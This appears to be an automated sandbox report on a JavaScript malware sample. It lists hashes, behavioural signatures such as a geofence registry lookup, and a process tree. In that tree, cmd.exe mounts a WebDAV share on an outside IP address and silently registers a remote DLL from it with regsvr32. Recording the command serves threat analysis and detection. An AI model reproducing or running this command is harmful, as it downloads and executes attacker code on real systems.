Analysis
-
max time kernel
134s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 01:12
Static task
static1
Behavioral task
behavioral1
Sample
327131957255965919.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
327131957255965919.js
Resource
win10v2004-20240709-en
General
-
Target
327131957255965919.js
-
Size
5KB
-
MD5
42c42669f7564adc9f345724dd30af85
-
SHA1
ec1c6ed5f831713707913da8bcf3fe1a54cc9028
-
SHA256
89aa726ddf30d80845be24626c6cadefa8c7c67923572fc996a8a49f7fa006a5
-
SHA512
82a59d0d70c0b18de5c96a2081b53c61bd4ae5298ce70483c6a7b00323ef3203a47f9a05c51e3e5bbe4162a374a939e0de694e0ea2bd603d9389fc27d6f50f22
-
SSDEEP
48:VA4Ud2T42QU0fYlr/A0ycMb2RRo3T5Sa+pIgiiifQYvAksAIgiiifQYvy3JeSTh:bI2QRoAI02RD/IRQYvAksAIRQYvy3JeW
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 5012 wrote to memory of 5008 5012 wscript.exe 84 PID 5012 wrote to memory of 5008 5012 wscript.exe 84 PID 5008 wrote to memory of 1556 5008 cmd.exe 86 PID 5008 wrote to memory of 1556 5008 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\327131957255965919.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\60321536024903.dll2⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1556
-
-